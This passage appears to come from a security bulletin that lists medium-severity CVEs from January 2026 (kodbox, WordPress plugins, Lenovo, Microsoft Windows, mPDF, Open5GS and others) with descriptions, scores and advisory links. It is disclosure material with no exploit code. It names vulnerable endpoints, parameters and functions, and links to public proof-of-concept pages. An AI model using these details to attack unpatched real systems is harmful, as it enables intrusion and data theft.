| kalcaddle--kodbox | A vulnerability was detected in kalcaddle kodbox up to 1.61.10. This issue affects some unknown processing of the file /?explorer/index/zip of the component Compression Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 6.3 | CVE-2026-1066 | VDB-341665: kalcaddle kodbox Compression zip command injection; VDB-341665: CTI Indicators (IOB, IOC, TTP, IOA); Submit #731436: kalcaddle kodbox <=1.61.10 Command Injection; https://github.com/DReazer/CV3/blob/main/Krce.md |
| keesiemeijer--Related Posts by Taxonomy | The Related Posts by Taxonomy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'related_posts_by_tax' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-16 | 6.4 | CVE-2026-0916 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0582fe7d-884c-4019-837a-861d36ccc842?source=cve https://plugins.trac.wordpress.org/browser/related-posts-by-taxonomy/tags/2.7.6/includes/functions.php#L259 |
| kimai--kimai | Kimai is a web-based multi-user time-tracking application. Prior to version 2.46.0, Kimai's export functionality uses a Twig sandbox with an overly permissive security policy (`DefaultPolicy`) that allows arbitrary method calls on objects available in the template context. An authenticated user with export permissions can deploy a malicious Twig template that extracts sensitive information including environment variables, all user password hashes, serialized session tokens, and CSRF tokens. Version 2.46.0 patches this issue. | 2026-01-18 | 6.8 | CVE-2026-23626 | https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg https://github.com/kimai/kimai/pull/5757 https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f https://github.com/kimai/kimai/releases/tag/2.46.0 |
| kiwicommerce--PDF Resume Parser | The PDF Resume Parser plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0. This is due to the plugin registering an AJAX action handler that is accessible to unauthenticated users and exposes SMTP configuration data including credentials. This makes it possible for unauthenticated attackers to extract sensitive SMTP credentials (username and password) from the WordPress configuration, which could be leveraged to compromise email accounts and potentially gain unauthorized access to other systems using the same credentials. | 2026-01-14 | 5.3 | CVE-2025-14464 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8a84bcc2-23e0-4624-89a4-7bbb1b34c498?source=cve https://plugins.trac.wordpress.org/browser/pdf-resume-parser/trunk/pdf-resume-parser.php#L309 https://plugins.trac.wordpress.org/browser/pdf-resume-parser/tags/1.0/pdf-resume-parser.php#L309 |
| kunzemarketing--Kunze Law | The Kunze Law plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin's shortcode in all versions up to, and including, 2.1 due to the plugin fetching HTML content from a remote server and injecting it into pages without any sanitization or escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. Additional presence of a path traversal vulnerability in the shortcode name allows writing malicious HTML files to arbitrary writable locations on the server. | 2026-01-14 | 4.4 | CVE-2025-15486 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7957619-e562-4043-920d-275c58684328?source=cve https://plugins.trac.wordpress.org/browser/kunze-law/tags/2.1/kunze-law.php#L406 https://plugins.trac.wordpress.org/browser/kunze-law/tags/2.1/kunze-law.php#L531 |
| Laborator--Kalium 3 \| Creative WordPress & WooCommerce Theme | The Kalium 3 \| Creative WordPress & WooCommerce Theme theme for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the kalium_vc_contact_form_request() function in all versions up to, and including, 3.29. This makes it possible for unauthenticated attackers to use the theme as an open mail relay and send email to arbitrary email addresses on the server's behalf. | 2026-01-15 | 5.3 | CVE-2025-12895 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e65a794-1901-4e54-be4f-9422fe444057?source=cve https://themeforest.net/item/kalium-creative-theme-for-professionals/10860525 https://documentation.laborator.co/kb/kalium/kalium-changelog/ |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the html/atendido/cadastro_ocorrencia.php endpoint of the WeGIA application. The application does not sanitize user-controlled data before rendering it inside the "Atendido" selection dropdown. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 4.3 | CVE-2026-23724 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3r3q-8573-g3cq https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, the web application is vulnerable to clickjacking attacks. The WeGIA application does not send any defensive HTTP headers related to framing protection. In particular, X-Frame-Options is missing and Content-Security-Policy with the frame-ancestors directive is not configured. Because of this, an attacker can load any WeGIA page inside a malicious HTML document, overlay deceptive elements, hide real buttons, or force accidental interaction with sensitive workflows. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 4.3 | CVE-2026-23731 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-99qp-hjvh-c59q https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| Lenovo--ThinkPad L13 Gen 6 BIOS | A potential vulnerability was reported in the BIOS of L13 Gen 6, L13 Gen 6 2-in-1, L14 Gen 6, and L16 Gen 2 ThinkPads which could result in Secure Boot being disabled even when configured as "On" in the BIOS setup menu. This issue only affects systems where Secure Boot is set to User Mode. | 2026-01-14 | 6.5 | CVE-2026-0421 | https://support.lenovo.com/us/en/product_security/LEN-210688 |
| Lenovo--ThinkPlus FU100 | A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive. | 2026-01-14 | 6.8 | CVE-2025-13453 | https://iknow.lenovo.com.cn/detail/436983 |
| Lenovo--ThinkPlus FU100 | A potential vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to gain access to sensitive device information. | 2026-01-14 | 4.7 | CVE-2025-13454 | https://iknow.lenovo.com.cn/detail/436983 |
| Lenovo--Vantage | An improper link following vulnerability was reported in the SmartPerformanceAddin for Lenovo Vantage that could allow an authenticated local user to perform an arbitrary file deletion with elevated privileges. | 2026-01-14 | 5.5 | CVE-2025-13154 | https://support.lenovo.com/us/en/product_security/LEN-208293 |
| linknacional--Rede Ita for WooCommerce Payment PIX, Credit Card and Debit | The Rede Itaú for WooCommerce plugin for WordPress is vulnerable to order status manipulation due to insufficient verification of data authenticity in all versions up to, and including, 5.1.2. This is due to the plugin failing to verify the authenticity of payment callbacks. This makes it possible for unauthenticated attackers to manipulate WooCommerce order statuses, marking unpaid orders as either paid or failed. | 2026-01-16 | 5.3 | CVE-2026-0939 | https://www.wordfence.com/threat-intel/vulnerabilities/id/722c666b-913f-4289-82e6-30aa0a3abc2b?source=cve https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L45 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L460 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L710 |
| linknacional--Rede Ita for WooCommerce Payment PIX, Credit Card and Debit | The Rede Itaú for WooCommerce - Payment PIX, Credit Card and Debit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the clearOrderLogs() function in all versions up to, and including, 5.1.2. This makes it possible for unauthenticated attackers to delete the Rede Order Logs metadata from all WooCommerce orders. | 2026-01-16 | 5.3 | CVE-2026-0942 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4927c060-f2b2-4916-b049-1442bba63e98?source=cve https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L42 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L58 |
| lobehub--lobe-chat | LobeChat is an open source chat application platform. Prior to version 2.0.0-next.180, a stored Cross-Site Scripting (XSS) vulnerability in the Mermaid artifact renderer allows attackers to execute arbitrary JavaScript within the application context. This XSS can be escalated to Remote Code Execution (RCE) by leveraging the exposed `electronAPI` IPC bridge, allowing attackers to run arbitrary system commands on the victim's machine. Version 2.0.0-next.180 patches the issue. | 2026-01-18 | 6.4 | CVE-2026-23733 | https://github.com/lobehub/lobe-chat/security/advisories/GHSA-4gpc-rhpj-9443 |
| logiceverest--Shipping Rates by City for WooCommerce | The Flat Shipping Rate by City for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'cities' parameter in all versions up to, and including, 1.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 4.9 | CVE-2026-0678 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ada476b-6978-4c38-a5d3-67266a709a3e?source=cve https://plugins.trac.wordpress.org/browser/flat-shipping-rate-by-city-for-woocommerce/trunk/shipping-method-class.php#L154 https://plugins.trac.wordpress.org/browser/flat-shipping-rate-by-city-for-woocommerce/tags/1.0.3/shipping-method-class.php#L154 |
| lottiefile--LottieFiles Lottie block for Gutenberg | The LottieFiles - Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled. | 2026-01-14 | 5.3 | CVE-2026-0717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21 |
| lwj--flow | A security vulnerability has been detected in lwj flow up to a3d2fe8133db9d3b50fda4f66f68634640344641. This affects the function uploadFile of the file \flow-master\flow-front-rest\src\main\java\com\dragon\flow\web\resource\flow\FormResource.java of the component SVG File Handler. The manipulation of the argument File leads to unrestricted upload. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 6.3 | CVE-2026-1126 | VDB-341718 \| lwj flow SVG File FormResource.java uploadFile unrestricted upload VDB-341718 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735122 \| https://gitee.com/lwj/flow flowable 1.0 Arbitrary File Upload https://gitee.com/lwj/flow/issues/IDIQSE |
| mailerlite--MailerLite WooCommerce integration | The MailerLite - WooCommerce integration plugin for WordPress is vulnerable to unauthorized data modification and deletion in all versions up to, and including, 3.1.3. This is due to missing capability checks on the resetIntegration() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's integration settings, delete all plugin options, and drop the plugin's database tables (woo_mailerlite_carts and woo_mailerlite_jobs), resulting in complete loss of plugin data including customer abandoned cart information and sync job history. | 2026-01-16 | 6.5 | CVE-2026-1000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e20deec4-f40c-4bd3-91f7-6a9d643a5520?source=cve https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/includes/WooMailerLite.php#L127 https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/admin/controllers/WooMailerLiteAdminSettingsController.php#L231 https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/includes/migrations/WooMailerLiteMigration.php#L33 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3415073%40woo-mailerlite%2Ftrunk&old=3399626%40woo-mailerlite%2Ftrunk&sfp_email=&sfph_mail= |
| makesweat--Makesweat | The Makesweat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'makesweat_clubid' setting in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2025-13627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88dec08d-cb27-4ea8-853e-0c12dd0a6ab6?source=cve https://it.wordpress.org/plugins/makesweat/ https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L64 https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L64 https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L85 https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L85 |
| mallsop--List Site Contributors | The List Site Contributors plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'alpha' parameter in versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-14 | 6.1 | CVE-2026-0594 | https://www.wordfence.com/threat-intel/vulnerabilities/id/026a2e0d-4d30-4133-9118-055026aa9f4a?source=cve https://plugins.trac.wordpress.org/browser/list-site-contributors/trunk/list-site-contributors.php#L435 https://plugins.trac.wordpress.org/browser/list-site-contributors/tags/1.1.8/list-site-contributors.php#L435 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops. | 2026-01-16 | 6.8 | CVE-2025-14435 | https://mattermost.com/security-updates |
| memsource--Phrase TMS Integration for WordPress | The Phrase TMS Integration for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_delete_log' AJAX endpoint in all versions up to, and including, 4.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete log files. | 2026-01-17 | 4.3 | CVE-2025-12168 | https://www.wordfence.com/threat-intel/vulnerabilities/id/396f2426-7bc4-4221-bc48-920bec5af6e5?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426034%40memsource-connector&new=3426034%40memsource-connector&sfp_email=&sfph_mail= |
| metagauss--EventPrime Events Calendar, Bookings and Tickets | The EventPrime - Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.7.0 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive booking data including user names, email addresses, ticket details, payment information, and order keys when the API is enabled by an administrator. The vulnerability was partially patched in version 4.2.7.0. | 2026-01-13 | 5.3 | CVE-2025-14507 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b170ed1-72ee-40b6-9882-e978d630f6bb?source=cve https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-eventprime-rest-api.php#L447 https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-eventprime-rest-api.php#L651 https://plugins.trac.wordpress.org/changeset/3422587/ https://plugins.trac.wordpress.org/changeset/3432454/ |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network. | 2026-01-13 | 5.4 | CVE-2026-20958 | Microsoft SharePoint Information Disclosure Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-01-13 | 4.6 | CVE-2026-20959 | Microsoft SharePoint Server Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows LDAP - Lightweight Directory Access Protocol allows an authorized attacker to perform tampering over a network. | 2026-01-13 | 6.5 | CVE-2026-20812 | LDAP Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Remote Procedure Call allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20821 | Remote Procedure Call Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20847 | Microsoft Windows File Explorer Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20872 | NTLM Hash Disclosure Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20925 | NTLM Hash Disclosure Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Windows Secure Boot stores Microsoft certificates in the UEFI KEK and DB. These original certificates are approaching expiration, and devices containing affected certificate versions must update them to maintain Secure Boot functionality and avoid compromising security by losing security fixes related to Windows boot manager or Secure Boot. The operating system's certificate update protection mechanism relies on firmware components that might contain defects, which can cause certificate trust updates to fail or behave unpredictably. This leads to potential disruption of the Secure Boot trust chain and requires careful validation and deployment to restore intended security guarantees. Affected certificates (Certificate Authority, location, purpose, expiration date): Microsoft Corporation KEK CA 2011, in the KEK, signs updates to the DB and DBX, expires 06/24/2026; Microsoft Corporation UEFI CA 2011, in the DB, signs 3rd party boot loaders, Option ROMs, etc., expires 06/27/2026; Microsoft Windows Production PCA 2011, in the DB, signs the Windows Boot Manager, expires 10/19/2026. For more information see this CVE and Windows Secure Boot certificate expiration and CA updates. | 2026-01-13 | 6.4 | CVE-2026-21265 | Secure Boot Certificate Expiration Security Feature Bypass Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Desktop Window Manager allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20805 | Desktop Window Manager Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20823 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Protection mechanism failure in Windows Remote Assistance allows an unauthorized attacker to bypass a security feature locally. | 2026-01-13 | 5.5 | CVE-2026-20824 | Windows Remote Assistance Security Feature Bypass Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20827 | Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows TPM allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20829 | TPM Trustlet Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Client-Side Caching (CSC) Service allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20839 | Windows Client-Side Caching (CSC) Service Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Management Services allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20862 | Windows Management Services Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to deny service over a network. | 2026-01-13 | 5.3 | CVE-2026-20927 | Windows SMB Server Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20932 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20937 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20939 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Hyper-V allows an authorized attacker to disclose information locally. | 2026-01-13 | 4.4 | CVE-2026-20825 | Windows Hyper-V Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to disclose information with a physical attack. | 2026-01-13 | 4.6 | CVE-2026-20828 | Windows rndismp6.sys Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Absolute path traversal in Windows Shell allows an unauthorized attacker to perform spoofing with a physical attack. | 2026-01-13 | 4.6 | CVE-2026-20834 | Windows Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows NDIS allows an authorized attacker to disclose information with a physical attack. | 2026-01-13 | 4.3 | CVE-2026-20936 | Windows NDIS Information Disclosure Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20935 | Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20819 | Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Use of uninitialized resource in Dynamic Root of Trust for Measurement (DRTM) allows an authorized attacker to disclose information locally. | 2026-01-13 | 4.4 | CVE-2026-20962 | Dynamic Root of Trust for Measurement (DRTM) Information Disclosure Vulnerability |
| Microsoft--Windows Server 2019 | Insertion of sensitive information into log file in Windows Kernel allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20818 | Windows Kernel Information Disclosure Vulnerability |
| Microsoft--Windows Server 2019 | Use of a broken or risky cryptographic algorithm in Windows Kerberos allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20833 | Windows Kerberos Information Disclosure Vulnerability |
| Microsoft--Windows Server 2022 | Generation of error message containing sensitive information in Windows Kernel allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20838 | Windows Kernel Information Disclosure Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Capability Access Management Service (camsvc) allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20851 | Capability Access Management Service (camsvc) Information Disclosure Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Heap-based buffer overflow in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 6.7 | CVE-2026-20876 | Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Capability Access Management Service (camsvc) allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20835 | Capability Access Management Service (camsvc) Information Disclosure Vulnerability |
| monetizemore--Advanced Ads Ad Manager & AdSense | The Advanced Ads - Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-17 | 4.9 | CVE-2025-12984 | https://www.wordfence.com/threat-intel/vulnerabilities/id/729e8a06-abaa-4468-8a80-1e5c6cbace92?source=cve https://plugins.trac.wordpress.org/browser/advanced-ads/tags/2.0.13/includes/admin/class-placement-list-table.php#L254 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429511%40advanced-ads&new=3429511%40advanced-ads&sfp_email=&sfph_mail= |
| mPDF--mPDF | mPDF 7.0 contains a local file inclusion vulnerability that allows attackers to read arbitrary system files by manipulating annotation file parameters. Attackers can generate URL-encoded or base64 payloads to include local files through crafted annotation content with file path specifications. | 2026-01-13 | 6.2 | CVE-2022-50897 | ExploitDB-50995 Official mPDF Project Homepage VulnCheck Advisory: mPDF 7.0 - Local File Inclusion |
| n/a--EyouCMS | A weakness has been identified in EyouCMS up to 1.7.1/5.0. Impacted is the function check_userinfo of the file Diyajax.php of the component Member Avatar Handler. Executing a manipulation of the argument viewfile can lead to unrestricted upload. The attack may be performed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 6.3 | CVE-2026-1107 | VDB-341699 \| EyouCMS Member Avatar Diyajax.php check_userinfo unrestricted upload VDB-341699 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #731540 \| Hainan Zanzan Network Technology Co. Eyoucms <=1.7.1 causing code execution due to file inclusion https://github.com/24-2021/vul3/blob/main/Eyoucms/Eyoucms%3D1.7.1%20check_userinfo%20api%20viewfile%20exists%2C%20causing%20code%20execution%20due%20to%20file%20inclusion.md https://github.com/24-2021/vul3/blob/main/Eyoucms/Eyoucms%3D1.7.1%20check_userinfo%20api%20viewfile%20exists%2C%20causing%20code%20execution%20due%20to%20file%20inclusion.md#poc |
| n/a--Mapnik | A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 5.3 | CVE-2025-15537 | VDB-341709 \| Mapnik dbfile.cpp string_value heap-based overflow VDB-341709 \| CTI Indicators (IOB, IOC, IOA) Submit #733348 \| mapnik Mapnik v4.2.0 and master-branch Heap-based Buffer Overflow https://github.com/mapnik/mapnik/issues/4543 https://github.com/oneafter/1218/blob/main/repro |
| n/a--net.sourceforge.plantuml:plantuml | Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG. | 2026-01-16 | 6.1 | CVE-2026-0858 | https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEPLANTUML-14552230 https://github.com/plantuml/plantuml/commit/6826315db092d2e432aeab1a0894e08017c6e4bd https://github.com/plantuml/plantuml/releases/tag/v1.2026.0 |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 98f76e98df35cd6a35e868aa62715db7f8141ac1. A patch should be applied to remediate this issue. | 2026-01-16 | 5.3 | CVE-2025-15528 | VDB-341595 \| Open5GS GTPv2 Bearer Response denial of service VDB-341595 \| CTI Indicators (IOB, IOC, TTP) Submit #728128 \| Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4225 https://github.com/open5gs/open5gs/issues/4225#issue-3769531006 https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1 |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The patch is named b19cf6a2dbf5d30811be4488bf059c865bd7d1d2. To fix this issue, it is recommended to deploy a patch. | 2026-01-16 | 5.3 | CVE-2025-15529 | VDB-341596 \| Open5GS s5c-handler.c sgwc_s5c_handle_create_session_response denial of service VDB-341596 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #728130 \| Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4226 https://github.com/open5gs/open5gs/issues/4226#issue-3769595366 https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2 |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.6. This affects the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. Executing a manipulation can lead to reachable assertion. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The issue report is flagged as already-fixed. | 2026-01-17 | 5.3 | CVE-2025-15530 | VDB-341597 \| Open5GS s11-handler.c assertion VDB-341597 \| CTI Indicators (IOB, IOC, IOA) Submit #728987 \| Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4231 https://github.com/open5gs/open5gs/issues/4231#issue-3774187007 |
